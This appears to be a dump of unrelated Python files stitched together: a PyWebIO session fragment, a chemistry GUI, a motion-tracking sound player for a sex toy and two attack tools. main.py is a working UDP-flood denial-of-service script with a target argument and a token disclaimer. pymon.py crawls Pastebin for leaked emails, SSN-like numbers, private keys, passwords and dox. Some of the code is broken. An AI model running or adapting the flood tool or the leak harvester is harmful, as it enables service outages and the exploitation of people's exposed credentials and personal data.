except Exception as e:
# 子类可能会重写 get_current_session ,所以不要用 ThreadBasedSession.get_current_session 来调用
if not isinstance(e, SessionException):
self.on_task_exception()
# todo: good to have -> clean up from `register_thread()`
if mutex:
run(callback)
else:
t = threading.Thread(target=run, kwargs=dict(callback=callback),
daemon=True)
self.register_thread(t)
t.start()
def register_callback(self, callback, serial_mode=False):
""" 向Session注册一个回调函数,返回回调id
:param Callable callback: 回调函数. 函数签名为 ``callback(data)``. ``data`` 参数为回调事件的值
:param bool serial_mode: 串行模式模式。若为 ``True`` ,则对于同一组件的点击事件,串行执行其回调函数
"""
assert (not iscoroutinefunction(callback)) and (not isgeneratorfunction(callback)), ValueError(
"In ThreadBasedSession.register_callback, `callback` must be a simple function, "
"not coroutine function or generator function. ")
self._activate_callback_env()
callback_id = 'CB-%s-%s' % (get_function_name(callback, 'callback'), random_str(10))
self.callbacks[callback_id] = (callback, serial_mode)
return callback_id
def register_thread(self, t: threading.Thread):
"""将线程注册到当前会话,以便在线程内调用 pywebio 交互函数。
会话会一直保持直到所有通过 `register_thread` 注册的线程以及当前会话的主任务线程退出
:param threading.Thread thread: 线程对象
"""
self.threads.append(t) # 保存 registered thread,用于主任务线程退出后等待注册线程结束
self.thread2session[id(t)] = self # 用于在线程内获取会话
event_mq = queue.Queue(maxsize=self.event_mq_maxsize) # 线程内的用户事件队列
self.task_mqs[self._get_task_id(t)] = event_mq
def need_keep_alive(self) -> bool:
# if callback thread is activated, then the session need to keep alive
return self.callback_thread is not None
class ScriptModeSession(ThreadBasedSession):
"""Script mode的会话实现"""
@classmethod
def get_current_session(cls) -> "ScriptModeSession":
if cls.instance is None:
raise SessionNotFoundException("Can't find current session. It might be a bug.")
if cls.instance.closed():
raise SessionClosedException()
return cls.instance
@classmethod
def get_current_task_id(cls):
task_id = super().get_current_task_id()
session = cls.get_current_session()
if task_id not in session.task_mqs:
session.register_thread(threading.current_thread())
return task_id
instance = None
def __init__(self, thread, session_info, on_task_command=None, loop=None):
"""
:param thread: 第一次调用PyWebIO交互函数的线程 todo 貌似本参数并不必要
:param on_task_command: 会话结束的处理函数。后端Backend在相应on_session_close时关闭连接时,
需要保证会话内的所有消息都传送到了客户端
:param loop: 事件循环。若 on_task_command 或者on_session_close中有调用使用asyncio事件循环的调用,
则需要事件循环实例来将回调在事件循环的线程中执行
"""
if ScriptModeSession.instance is not None:
raise RuntimeError("ScriptModeSession can only be created once.")
ScriptModeSession.instance = self
super().__init__(target=None, session_info=session_info, on_task_command=on_task_command, loop=loop)
tid = id(thread)
event_mq = queue.Queue(maxsize=self.event_mq_maxsize)
self.task_mqs[tid] = event_mq
|
main.py
|
import threading
import socket
import random
import time
import sys
import os
class DOS: # Initialise the class
def main(self): # Main function contains the main code
try: # Check the arguments given with the command
self.target = str(sys.argv[1])
self.threads = int(sys.argv[2])
self.timer = float(sys.argv[3])
except IndexError: # If one of the arguments were not given correctly
print(f" [+] Command usage: python {sys.argv[0]} <target> <threads> <time> !") # Print the correct command usage
sys.exit() # Exit the code
os.system('cls' if os.name == 'nt' else 'clear') # Clear the screen
print(""" ██████╗ ██████╗ ███████╗███████╗███████╗██████╗
██╔══██╗██╔═══██╗██╔════╝██╔════╝██╔════╝██╔══██╗
██║ ██║██║ ██║███████╗███████╗█████╗ ██████╔╝
██║ ██║██║ ██║╚════██║╚════██║██╔══╝ ██╔══██╗
██████╔╝╚██████╔╝███████║███████║███████╗██║ ██║
╚═════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝╚═╝ ╚═╝
[!] Disclaimer: This script is made for educational
purporses and the developers assume no liabilaty
and are not responsible for any misuse or damage
caused by DOSSER
""") # Display the splash screen
time.sleep(5) # Wait a few seconds to give time to read the disclaimer
self.timeout = time.time() + 1 * self.timer + 2 # Set how long time the attack will last
self.start() # Start the attack
def attack(self): # The attack function getting ran by each of the threads
try: # Catch any error that may occur
bytes = random._urandom(1024) # Generate our random byte string
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Get the socket
while time.time() < self.timeout: # Loop untill the time is
port = random.randint(20, 55500) # Get the port
sock.sendto( # Send the data to the server
bytes * random.randint(5, 15),
(self.target, port)
)
return # End the script once the loop is done
sys.exit()
except: # Catch the errors and just ignore them
pass
def start(self): # Function to manage the attack
print(" [+] Starting Attack..\n") # Let the user know its starting the attack
time.sleep(2) # Sleep a bit to let the user read the message
for i in range(0, self.threads): # Loop over the amount of threads the user wants to use
print(f" [?] Starting thread {i}") # Let the user know a thread is starting
threading.Thread(target=self.attack).start() # Start the thread with the attack function
time.sleep(.3) # Wait a bit for dramatic effect
print("") # Print a newline at the end
if __name__ == '__main__': # If the file is getting ran directly
DOSClient = DOS() # Create the ddos client ( Class )
DOSClient.main() # Run the main function
|
pymon.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""PyMon
Author: -zYMTOM'
"""
import re
import requests
from bs4 import BeautifulSoup
import time
import threading
class pastebinLinks():
def __init__():
r = requests.post("http://pastebin.com/archive")
var = BeautifulSoup(r.text.encode('utf-8')).find("div", {"id": "content_left"})
regex = re.compile('<a href="\/([A-Za-z]{1,9})">(.*?)<\/a>')
reg = regex.findall(str(var))
for captures in reg:
if in_array(links, captures[0]) == False:
links.insert(len(links)+1, [captures[0], captures[1]])
print("Pastebin ID " + captures[0] + " Found")
time.sleep(30)
super(pastebinLinks).__init__()
class getPastebinPastes():
def __init__():
self.f = open('pastes.txt', 'a')
newlinks = []
for x in links:
if x not in crawled:
getlink = pastebinGet(x)
if getlink:
crawled.insert(len(crawled)+1, x)
match = False
for reg in regexes:
if reg.match(getlink):
match = True
for reg in regbl:
if reg.match(getlink):
match = False
if match:
print"Found interesting paste!"
self.f.write("PasteID: " + crawled + " \n" + getlink + "\n==================================\n")
time.sleep(5)
super(getPastebinPastes).__init__()
def pastebinGet(link):
r = requests.post("http://pastebin.com/raw.php?i="+link)
if not '<div class="content_title">This paste has been removed!</div>' in r.text:
return r.text
def in_array(array, compare0):
exist = False
for i in range(0, len(array)):
if compare0[0] in array[i][0]:
exist = True
break
return exist
def MonMain():
print "Starting"
pastebin_thread = threading.Thread(target=pastebinLinks)
pastebin_threadpaste = threading.Thread(target=getPastebinPastes)
for thread in (pastebin_thread, pastebin_threadpaste):
thread.daemon = True
thread.start()
if __name__ == "__main__":
global crawled
global regbl
global regexes
global links
links = []
crawled = []
regexes = [
re.compile(r'[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}', re.I),
re.compile(r'\d{3}-?\d{2}-?\d{4}'),
re.compile(r'[^<A-F\d/]([A-F\d]{32})[^A-F\d]', re.I),
re.compile(r'FBI\s*Friday', re.I), # will need to work on this to not match CSS
re.compile(r'(lulzsec|antisec)', re.I),
re.compile(r'enable\s+secret', re.I),
re.compile(r'enable\s+password', re.I),
re.compile(r'\W(AIza.{35})'),
re.compile(r'<dionaea\.capture>', re.I),
re.compile(r'BEGIN PGP PRIVATE', re.I),
re.compile(r'BEGIN RSA PRIVATE', re.I),
re.compile(r'((customers?|email|users?|members?|acc(?:oun)?ts?)([-_|/\s]?(address|name|id[^")a-zA-Z0-9_]|[-_:|/\\])))', re.I),
re.compile(r'((\W?pass(wor)?d|hash)[\s|:])', re.I),
re.compile(r'((\btarget|\bsite)\s*?:?\s*?(([a-z][\w-]+:/{1,3})?([-\w\s_/]+\.)*[\w=/?%]+))', re.I), # very basic URL check - may be improved later
re.compile(r'(my\s?sql[^i_\.]|sql\s*server)', re.I),
re.compile(r'((host|target)[-_\s]+ip:)', re.I),
re.compile(r'(data[-_\s]*base|\Wdb)', re.I), # added the non-word char before db.. we'll see if that helps
re.compile(r'(table\s*?:)', re.I),
re.compile(r'((available|current)\s*(databases?|dbs?)\W)', re.I),
re.compile(r'(hacked\s*by)', re.I),
re.compile(r'dox', re.I)
]
regbl = [
re.compile(r'(select\s+.*?from|join|declare\s+.*?\s+as\s+|update.*?set|insert.*?into)', re.I), # SQL
re.compile(r'(define\(.*?\)|require_once\(.*?\))', re.I), # PHP
re.compile(r'(function.*?\(.*?\))', re.I),
re.compile(r'(Configuration(\.Factory|\s*file))', re.I),
re.compile(r'((border|background)-color)', re.I), # Basic CSS (Will need to be improved)
re.compile(r'(Traceback \(most recent call last\))', re.I),
re.compile(r'(java\.(util|lang|io))', re.I),
re.compile(r'(sqlserver\.jdbc)', re.I),
re.compile(r'faf\.fa\.proxies', re.I),
re.compile(r'Technic Launcher is starting', re.I),
re.compile(r'OTL logfile created on', re.I),
re.compile(r'RO Game Client crashed!', re.I),
re.compile(r'Selecting PSO2 Directory', re.I),
re.compile(r'TDSS Rootkit', re.I),
re.compile(r'SysInfoCrashReporterKey', re.I),
re.compile(r'Current OS Full name: ', re.I),
re.compile(r'Multi Theft Auto: ', re.I),
re.compile(r'Initializing cgroup subsys cpuset', re.I),
re.compile(r'Init vk network', re.I),
re.compile(r'MediaTomb UPnP Server', re.I)
]
MonMain()
|
pysmash.py
|
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 21 17:15:00 2020
@Author: Zhi-Jiang Yang, Dong-Sheng Cao
@Institution: CBDD Group, Xiangya School of Pharmaceutical Science, CSU, China
@Homepage: http://www.scbdd.com
@Mail: yzjkid9@gmail.com; oriental-cds@163.com
@Blog: https://blog.iamkotori.com
♥I love Princess Zelda forever♥
"""
import multiprocessing as mp
import os
import time
import socket
from threading import Thread, Event
import tkinter as tk
from tkinter import ttk
from tkinter.messagebox import showinfo
from tkinter.scrolledtext import ScrolledText
from tkinter import Tk, Label, Entry, Button, Radiobutton, Scrollbar, Text, Frame
from tkinter.filedialog import askopenfilename
from tkinter.filedialog import asksaveasfilename
from tkinter import messagebox
import pandas as pd
from getRes import getFingerprintRes, predict
class SmashGui(Tk):
def __init__(self):
"""
Init
"""
Tk.__init__(self)
# self.pack()
self.geometry('600x400+500+200')
self.resizable(0, 0)
self.title('Smash molecule and obtain significant fragments')
self.bg = '#abbfc5'
self.fg = '#b70131'
self.btg = '#fdafaa'
self.filename = ''
self.lblFont = ('Times New Roman', 14)
self.creatTab()
self.createWidgets()
self.createPredictWidgets()
self.thread_run = None
self.thread_run_stop = Event()
try:
self.iconbitmap(r"icon.ico")
except:
self.iconbitmap(r"gui\smash\icon.ico")
def readFile(self, file, **kwgrs):
extendName = os.path.splitext(file)[1]
if extendName == '.csv':
data = pd.read_csv(file, **kwgrs)
elif extendName == '.txt':
data = pd.read_csv(file, sep='\t', **kwgrs)
else:
data = pd.read_excel(file, **kwgrs)
return data
# print(self.data)
def main_thread(self, func, args=()):
self.thread_run = Thread(target=func, args=args)
self.thread_run.setDaemon(True)
self.thread_run.start()
def stop_run(self):
self.thread_run_stop.set()
self.thread_run.join()
self.thread_run = None
def downloadRes(self, data, datype, preview=True, index=False, **kwgrs):
if preview:
self.previewRes(data, datype)
if datype == 'df':
savefile = asksaveasfilename(filetypes=(("CSV file", "*.csv*"), ))
if savefile:
try:
data.to_csv(savefile, index=index, **kwgrs)
except PermissionError:
messagebox.showerror(
title='Error!', message="Permission Denied!!!")
else:
showinfo('Succesed','file saved')
else:
pass
elif datype == 'HTML':
savefile = asksaveasfilename(
filetypes=(("Html file", "*.html*"), ))
if savefile:
try:
self.model.savePvalue(data, savefile)
except PermissionError:
messagebox.showerror(
title='Error!', message="Permission Denied!!!")
else:
showinfo('Succesed','file saved')
else:
pass
else:
savefile = asksaveasfilename(
filetypes=(("pkl file", "*.pkl*"), ))
if savefile:
try:
self.model.saveModel(savefile)
except PermissionError:
messagebox.showerror(
title='Error!', message="Permission Denied!!!")
else:
showinfo('Succesed','file saved')
else:
pass
def previewRes(self, data, datype=None, display=5):
self.previewPad['state'] = 'normal'
self.previewPad.delete(1.0, tk.END)
if datype == 'df' or datype == 'HTML':
data = data.head(display)
self.previewPad.insert(tk.END, data.to_string(
max_cols=10, justify='center'))
self.previewPad['state'] = 'disabled'
else:
self.previewPad.insert(tk.END, self.kwgrs)
self.previewPad['state'] = 'disabled'
def preview(self):
self.process.destroy()
self.view = tk.Toplevel(self)
self.view.geometry('800x650+500+300')
lblsubMatrix = Label(self.view, text='subMatrix',
fg=self.fg, font=self.lblFont)
lblsubMatrix.place(x=100, y=80)
lblsubPvalue = Label(self.view, text='subPvalue',
fg=self.fg, font=self.lblFont)
lblsubPvalue.place(x=350, y=80)
lblsubHTML = Label(self.view, text='Model',
fg=self.fg, font=self.lblFont)
lblsubHTML.place(x=600, y=80)
btnPreviewMatrix = Button(self.view, text='Preview',
bg=self.btg,
font=('Times New Roman', 12),
width=8,
command=lambda: self.previewRes(
data=self.subMatrix.head(), datype='df', display=5)
)
btnPreviewMatrix.place(x=60, y=120)
btnDownloadMatrix = Button(self.view, text='Download',
bg=self.btg,
font=('Times New Roman', 12),
width=8,
command=lambda: self.main_thread(
self.downloadRes, args=(self.subMatrix, 'df', True, False)
))
btnDownloadMatrix.place(x=150, y=120)
btnPreviewPvalue = Button(self.view, text='Preview',
bg=self.btg,
font=('Times New Roman', 12),
width=8,
command=lambda: self.previewRes(
data=self.subPvalue.head(), datype='df', display=5),
)
btnPreviewPvalue.place(x=310, y=120)
btnDownloadPvalue = Button(self.view, text='Download',
bg=self.btg,
font=('Times New Roman', 12),
width=8,
command=lambda: self.main_thread(
self.downloadRes, args=(self.subPvalue, 'HTML')
))
btnDownloadPvalue.place(x=400, y=120)
btnPreviewModel = Button(self.view, text='Preview',
bg=self.btg,
font=('Times New Roman', 12),
width=8,
command=lambda: self.previewRes(
None, 'Model', 50)
)
btnPreviewModel.place(x=560, y=120)
btnDownloadModel = Button(self.view, text='Download',
bg=self.btg,
font=('Times New Roman', 12),
width=8,
command=lambda: self.main_thread(
self.downloadRes, args=(None, 'Model')
))
btnDownloadModel.place(x=650, y=120)
self.previewPad = Text(self.view, width=105, height=35,
wrap="none", borderwidth=0,
)
self.previewPad.place(x=20, y=160)
vscroll = Scrollbar(self.view, orient=tk.VERTICAL,
command=self.previewPad.yview)
self.previewPad['yscroll'] = vscroll.set
vscroll.pack(side=tk.RIGHT, fill=tk.Y)
hscroll = Scrollbar(self.view, orient=tk.HORIZONTAL,
command=self.previewPad.xview)
self.previewPad['xscroll'] = hscroll.set
hscroll.pack(side=tk.BOTTOM, fill=tk.X)
self.previewPad['state'] = 'disabled'
def main(self):
self.kwgrs = {'smiles_field': self.cmbSmiles.get(),
'label_field': self.cmbLabel.get(),
'fingerprint': self.cmbFP.get(),
'radius': self.Radius.get(),
'minRadius': self.minRadius.get(),
'minPath': self.minPath.get(),
'maxPath': self.maxPath.get(),
'folded': False,
'minRatio': self.minRatio.get(),
'minNum': self.minNum.get(),
'aimLabel': self.cmbAim.get(),
'n_jobs': self.n_jobs.get(),
'Bonferroni': self.Bonferroni.get(),
'minAccuracy': self.minAcc.get(),
'pValue': self.pValue.get()}
def add(words):
textPad['state'] = 'normal'
textPad.insert(tk.END, words)
textPad['state'] = 'disable'
self.process = tk.Toplevel(self)
self.process.geometry('400x300+500+200')
# self.process.resizable(0,0)
self.process.title('Running...')
lblnow = Label(self.process, text='Processing',
font=self.lblFont)
lblnow.place(x=135, y=40)
textPad = ScrolledText(self.process, width=48, height=13)
textPad.place(x=43, y=85)
textPad['state'] = 'disable'
btnNext = Button(self.process, text='Next', command=self.preview)
btnNext.place(x=320, y=265, width=50, height=25)
btnNext['state'] = 'disable'
btnCancel = Button(self.process, text='Cancel',
command=lambda: self.process.destroy())
btnCancel.place(x=260, y=265, width=50, height=25)
add('Load file... ')
data = self.readFile(self.filename)
self.model, self.subMatrix, self.subPvalue = getFingerprintRes(
textPad, data, **self.kwgrs)
time.sleep(1)
add('\nFinished!')
btnNext['state'] = 'normal'
def main_predict(self):
self.detailPad['state'] = 'normal'
self.detailPad.insert(tk.END, 'Waiting...\n')
self.detailPad['state'] = 'disable'
data = self.readFile(self.predFileName)
smis = data[self.cmbPredSmiles.get()].values
y_pred, self.predMatrix = predict(self.modelFileName, smis)
self.predMatrix['PredLabel'] = y_pred
self.btnSaveMatrix['state'] = 'normal'
self.detailPad['state'] = 'normal'
self.detailPad.insert(tk.END, 'Finished!!!\n')
self.detailPad['state'] = 'disable'
# print(self.predMatrix)
def creatTab(self):
tab_main = ttk.Notebook(self)
tab_main.place(relx=0.01, rely=0.01, relwidth=0.98, relheight=0.98)
self.fitTab = Frame(tab_main)
tab_main.add(self.fitTab, text='Calculate')
self.predTab = Frame(tab_main)
tab_main.add(self.predTab, text='Predict')
def createWidgets(self):
def getFileName():
self.txtFile['state'] = 'normal'
self.txtFile.delete(0, tk.END)
self.filename = askopenfilename(
filetypes=(("csv file", "*.csv*"),
("Excel file", "*.xlsx*;*.xls*"),
("Text file", "*.txt*")))
if self.filename:
self.txtFile.insert(tk.END, self.filename)
data = self.readFile(self.filename, nrows=0)
self.cols = list(data.columns)
self.cmbSmiles["values"] = self.cols
self.cmbLabel["values"] = self.cols
self.cmbSmiles['state'] = 'readonly'
# self.cmbLabel['state'], self.cmbAim['state'],
# self.cmbFP['state'] = ['readonly']*4
else:
disable()
self.txtFile['state'] = 'readonly'
def _changesmiles(*args):
self.cmbLabel['state'] = 'readonly'
def chooseAimLabel(*args):
self.cmbAim['state'] = 'readonly'
self.cmbFP['state'] = 'readonly'
self.cmbAim.set('')
data = self.readFile(self.filename, usecols=[self.cmbLabel.get()])
labels = list(set(data.iloc[:, 0]))
self.cmbAim['values'] = labels
self.cmbAim.current(1)
# def ignorenBits(*args):
# if self.Folded.get():
# txtnBits['state'] = 'normal'
# else:
# txtnBits['state'] = 'disable'
def disable(*args):
txtminRadius['state'], txtRadius['state'], txtminPath['state'],\
txtmaxPath['state'], txtminNum['state'], txtminRatio['state'],\
txtPvalue['state'], txtnjobs['state'], btnRun['state'],\
txtAcc['state'], cmbBon['state'] = ['disable']*11
self.cmbSmiles['state'], self.cmbLabel['state'], self.cmbAim['state'],\
self.cmbFP['state'] = ['disable']*4
def changestate(*args):
txtminNum['state'], txtminRatio['state'], txtPvalue['state'],\
txtnjobs['state'], btnRun['state'], txtAcc['state'] = [
'normal']*6
cmbBon['state'] = 'readonly'
if self.cmbFP.get() == 'Circular':
# cmbFolded['state'] = 'readonly'
# ignorenBits()
txtminRadius['state'], txtRadius['state'] = ['normal']*2
txtminPath['state'], txtmaxPath['state'] = ['disable']*2
elif self.cmbFP.get() == 'Path':
# cmbFolded['state'] = 'normal'
# ignorenBits()
txtminRadius['state'], txtRadius['state'] = ['disable']*2
txtminPath['state'], txtmaxPath['state'] = ['normal']*2
elif self.cmbFP.get() == 'Function Group':
txtminRadius['state'], txtRadius['state'],\
txtminPath['state'], txtmaxPath['state'] = ['disable']*4
# global image
# image = tk.PhotoImage(file='logo.gif')
# imgLabel = Label(self, image=image).place(x=170,y=20)
###################### Select File Module #######################
color = '#ffab66'
bbg = Label(self.fitTab, bg=color,
width=500, height=4)
bbg.place(x=0, y=0)
lblFile = Label(self.fitTab, text='>>> Select the file',
font=self.lblFont, bg=color,
fg='#b70131')
lblFile.place(x=5, y=10)
self.txtFile = Entry(self.fitTab, width=60)
self.txtFile.place(x=7, y=35)
self.txtFile['state'] = 'readonly'
btnGetFile = Button(self.fitTab, text='Browse...',
command=getFileName,
bg='#66baff',
width=18)
btnGetFile.place(x=440, y=30)
####################### Select File Module #######################
####################### Select Aim Field Module #######################
color = '#ffb97f'
bbg = Label(self.fitTab, bg=color,
width=500, height=4)
bbg.place(x=0, y=74)
lblField = Label(self.fitTab, text='>>> Select related field',
font=self.lblFont, bg=color, fg=self.fg)
lblField.place(x=0, y=74)
lblSmiles = Label(self.fitTab, text='SMILES',
font=('Times New Roman', 12),
bg=color)
lblSmiles.place(x=20, y=105)
self.cmbSmiles = ttk.Combobox(self.fitTab, width=12)
self.cmbSmiles.place(x=85, y=105)
self.cmbSmiles.bind("<<ComboboxSelected>>", _changesmiles)
lbllabel = Label(self.fitTab, text='Label',
font=('Times New Roman', 13),
bg=color)
lbllabel.place(x=210, y=105)
self.cmbLabel = ttk.Combobox(self.fitTab, width=12)
self.cmbLabel.place(x=260, y=105)
self.cmbLabel.bind("<<ComboboxSelected>>", chooseAimLabel)
lbllabel = Label(self.fitTab, text='Aim Label',
font=('Times New Roman', 13),
bg=color)
lbllabel.place(x=385, y=105)
self.cmbAim = ttk.Combobox(self.fitTab, width=12)
self.cmbAim.place(x=468, y=105)
####################### Select Aim Field Module #######################
####################### Select Fragment Type #######################
color = '#ffc799'
bbg = Label(self.fitTab, bg=color,
width=45, height=10)
bbg.place(x=0, y=140)
lblFPM = Label(self.fitTab, text=">>> Adjust fragment parameter",
font=self.lblFont, bg=color, fg=self.fg)
lblFPM.place(x=0, y=140)
lblFP = Label(self.fitTab, text='Fragment Type',
font=('Times New Roman', 12),
bg=color)
lblFP.place(x=15, y=180)
self.cmbFP = ttk.Combobox(self.fitTab, width=14)
self.cmbFP['values'] = ['Circular', 'Path', 'Function Group']
self.cmbFP.place(x=120, y=180)
self.cmbFP['state'] = "readonly"
self.cmbFP.bind("<<ComboboxSelected>>", changestate)
####################### Select Fragment Type #######################
####################### Adjust Figerprint Param Module#######################
lblminRadius = Label(self.fitTab, text='minRadius', bg=color,
font=('Times New Roman', 13))
lblminRadius.place(x=15, y=220)
self.minRadius = tk.IntVar(value=1)
txtminRadius = Entry(self.fitTab, width=5, textvariable=self.minRadius)
txtminRadius.place(x=95, y=220)
lblRadius = Label(self.fitTab, text='maxRadius', bg=color,
font=('Times New Roman', 13))
lblRadius.place(x=155, y=220)
self.Radius = tk.IntVar(value=2)
txtRadius = Entry(self.fitTab, width=5, textvariable=self.Radius)
txtRadius.place(x=235, y=220)
lblminPath = Label(self.fitTab, text='minPath', bg=color,
font=('Times New Roman', 13))
lblminPath.place(x=15, y=275)
self.minPath = tk.IntVar(value=1)
txtminPath = Entry(self.fitTab, width=5, textvariable=self.minPath)
txtminPath.place(x=95, y=275)
lblmaxPath = Label(self.fitTab, text='maxPath', bg=color,
font=('Times New Roman', 13))
lblmaxPath.place(x=155, y=275)
self.maxPath = tk.IntVar(value=7)
txtmaxPath = Entry(self.fitTab, width=5, textvariable=self.maxPath)
txtmaxPath.place(x=235, y=275)
####################### Adjust Figerprint Param Module#######################
####################### Adjust Running Param Module#######################
color = '#ffd5b2'
bbg = Label(self.fitTab, bg=color,
width=45, height=10)
bbg.place(x=310, y=140)
lblRP = Label(self.fitTab, text='>>> Adjust running parameter',
bg=color, fg=self.fg, font=self.lblFont)
lblRP.place(x=310, y=140)
lblminNum = Label(self.fitTab, text='minNum', bg=color,
font=('Times New Roman', 13))
lblminNum.place(x=320, y=180)
self.minNum = tk.IntVar(value=5)
txtminNum = Entry(self.fitTab, width=7, textvariable=self.minNum)
txtminNum.place(x=390, y=180)
lblRatio = Label(self.fitTab, text='minRatio', bg=color,
font=('Times New Roman', 13))
# lblRatio.place(x=450, y=180)
self.minRatio = tk.DoubleVar(value=0.4)
txtminRatio = Entry(self.fitTab, width=7, textvariable=self.minRatio)
# txtminRatio.place(x=520, y=180)
lblPvalue = Label(self.fitTab, text='p-value', bg=color,
font=('Times New Roman', 13))
lblPvalue.place(x=320, y=230)
self.pValue = tk.DoubleVar(value=0.05)
txtPvalue = Entry(self.fitTab, width=7, textvariable=self.pValue)
txtPvalue.place(x=390, y=230)
lblAcc = Label(self.fitTab, text='minAcc', bg=color,
font=('Times New Roman', 13))
lblAcc.place(x=450, y=180)
self.minAcc = tk.DoubleVar(value=0.70)
txtAcc = Entry(self.fitTab, width=7, textvariable=self.minAcc)
txtAcc.place(x=520, y=180)
lblnjobs = Label(self.fitTab, text='n_jobs', bg=color,
font=('Times New Roman', 13))
lblnjobs.place(x=390, y=280)
self.n_jobs = tk.IntVar(value=1)
txtnjobs = Entry(self.fitTab, width=7, textvariable=self.n_jobs)
txtnjobs.place(x=450, y=280)
lblBon = Label(self.fitTab, text='Bonferroni',
font=('Times New Roman', 12),
bg=color)
lblBon.place(x=450, y=230)
self.Bonferroni = tk.BooleanVar()
cmbBon = ttk.Combobox(self.fitTab, width=4,
textvariable=self.Bonferroni)
cmbBon['values'] = [False, True]
cmbBon.current(0)
cmbBon.place(x=520, y=230)
####################### Adjust Running Param Module#######################
####################### Run Module#######################
color = '#fff1e5'
bbg = Label(self.fitTab, bg=color,
width=100, height=10)
bbg.place(x=0, y=310)
btnRun = Button(self.fitTab, text='Calculate',
font=('Times New Roman', 16),
bg='#e5f3ff', width=10, height=1,
command=lambda: self.main_thread(self.main),
# command=self.preview
)
btnRun.place(x=210, y=320)
disable()
def createPredictWidgets(self):
#####################################################################
# Prediction
# Prediction
# Prediction
# Prediction
#####################################################################
def getFileName():
self.txtPredFile['state'] = 'normal'
self.txtPredFile.delete(0, tk.END)
self.predFileName = askopenfilename(
filetypes=(("csv file", "*.csv*"),
("Excel file", "*.xlsx*;*.xls*"),
("Text file", "*.txt*")))
if self.predFileName:
self.txtPredFile.insert(tk.END, self.predFileName)
data = self.readFile(self.predFileName, nrows=0)
self.predCols = list(data.columns)
self.cmbPredSmiles["values"] = self.predCols
self.cmbPredSmiles['state'] = 'readonly'
# else:
# disable()
self.txtPredFile['state'] = 'readonly'
def getModelFileName():
self.txtModelFile['state'] = 'normal'
self.txtModelFile.delete(0, tk.END)
self.modelFileName = askopenfilename(
filetypes=(("pbz2 file", "*.pbz2*"),))
if self.modelFileName:
self.txtModelFile.insert(tk.END, self.modelFileName)
# data = self.readFile(self.PvFileName, nrows=0)
# self.pvCols = list(data.columns)
# self.cmbPvalue["values"] = self.pvCols
# self.cmbPvalue['state'] = 'readonly'
# else:
# disable()
self.txtModelFile['state'] = 'readonly'
color = '#ffab66'
bbg = Label(self.predTab, bg=color,
width=500, height=4)
bbg.place(x=0, y=0)
lblPredFile = Label(self.predTab, text='>>> Select the file and SMILES field',
font=self.lblFont, bg=color,
fg='#b70131')
lblPredFile.place(x=0, y=10)
self.txtPredFile = Entry(self.predTab, width=50)
self.txtPredFile.place(x=7, y=35)
self.txtPredFile['state'] = 'readonly'
btnGetPredFile = Button(self.predTab, text='Browse...',
command=getFileName,
bg='#66baff',
width=7)
btnGetPredFile.place(x=365, y=30)
self.cmbPredSmiles = ttk.Combobox(self.predTab, width=12)
self.cmbPredSmiles.place(x=450, y=30)
self.cmbPredSmiles['state'] = 'disable'
color = '#ffb97f'
bbg = Label(self.predTab, bg=color,
width=500, height=4)
bbg.place(x=0, y=74)
lblModelFile = Label(self.predTab, text='>>> Select the model file',
font=self.lblFont, bg=color,
fg='#b70131')
lblModelFile.place(x=0, y=74)
self.txtModelFile = Entry(self.predTab, width=70)
self.txtModelFile.place(x=7, y=110)
self.txtModelFile['state'] = 'readonly'
btnGetModelFile = Button(self.predTab, text='Browse...',
command=getModelFileName,
bg='#66baff',
width=7)
btnGetModelFile.place(x=505, y=105)
color = '#ffd5b2'
bbg = Label(self.predTab, bg=color,
width=500, height=7)
bbg.place(x=0, y=147)
btnPredict = Button(self.predTab, text='Predict',
command=lambda: self.main_thread(
self.main_predict),
bg='#66baff',
width=7)
btnPredict.place(x=250, y=165)
self.btnSaveMatrix = Button(self.predTab, text='Save Predict Result',
command=lambda: self.main_thread(
self.downloadRes, args=(self.predMatrix, 'df', False, False)
),
bg='#66baff',
width=20)
self.btnSaveMatrix.place(x=210, y=220)
self.btnSaveMatrix['state'] = 'disable'
self.detailPad = Text(self.predTab, width=30, height=5,
wrap="none", borderwidth=0,
)
self.detailPad.place(x=170, y=280)
if '__main__' == __name__:
mp.freeze_support()
gui = SmashGui()
gui.mainloop()
|
motion_recognizer.py
|
from collections import deque
import enum
import time
import os
import numpy as np
from skspatial.objects import Line
from skspatial.objects import Points
class MotionLineDetector:
MAX_POINT = 60
def __init__(self):
self.past_points = deque([])
self.last_time = None
def get_next_line(self, point):
self.past_points.append(point)
if len(self.past_points) > self.MAX_POINT:
self.past_points.popleft()
self.last_time = time.time()
if len(self.past_points) == self.MAX_POINT:
max_movement = 0
for pt2, pt1 in zip(list(self.past_points)[1:], list(self.past_points)[:-1]):
movement = np.linalg.norm(pt2 - pt1)
if movement > max_movement:
max_movement = movement
if (max_movement / (time.time() - self.last_time)) < 0.1:
return None
points = Points(list(self.past_points))
line_fit = Line.best_fit(points)
direction = np.array(line_fit.direction)
# I defined this side will be the positive direction.
if direction[0] < 0:
direction *= -1
direction = direction / np.linalg.norm(direction)
return direction
else:
return None
from pydub import AudioSegment
from pydub.playback import play
import threading
import glob
# Load mp3s.
songs = [AudioSegment.from_mp3(sound_path) for sound_path in glob.glob("sounds/*.mp3")]
def play_ex():
song_index = np.random.randint(0, len(songs))
play(songs[song_index])
class OnahoStateEstimator:
MAX_FRAME = 30 * 2
WAIT_TIME = 30
def __init__(self):
self.previous_center = None
self.current_position = 0
self.recent_positions = deque([])
self.remaining_wait = 0
def add_current_state(self, line, center):
if self.previous_center is not None:
move_distance = np.dot(line, center - self.previous_center)
self.current_position += move_distance
self.previous_center = center
if len(self.recent_positions) == self.MAX_FRAME:
self.recent_positions.popleft()
self.recent_positions.append(self.current_position)
min_pos = min(self.recent_positions)
max_pos = max(self.recent_positions)
rate = (max_pos - min_pos) * 0.5
print(max_pos - min_pos)
if (max_pos - min_pos) > 0.05:
if min_pos > self.current_position - rate and self.remaining_wait <= 0:
t = threading.Thread(target=play_ex)
t.start()
self.remaining_wait = 30
self.remaining_wait -= 1
from dataclasses import dataclass
@dataclass
class VelocityBasedInsertionEstimatorOption:
forward_backward_velocity_threashold: float = 0.35
no_motion_velocity_threashold: float = 0.20
sound_wait_time: int = 5
class VelocityBasedInsertionEstimator:
class OnahoState(enum.Enum):
INSERTING = "inserting"
OUTGOING = "outgoing"
NO_MOTION = "no_motion"
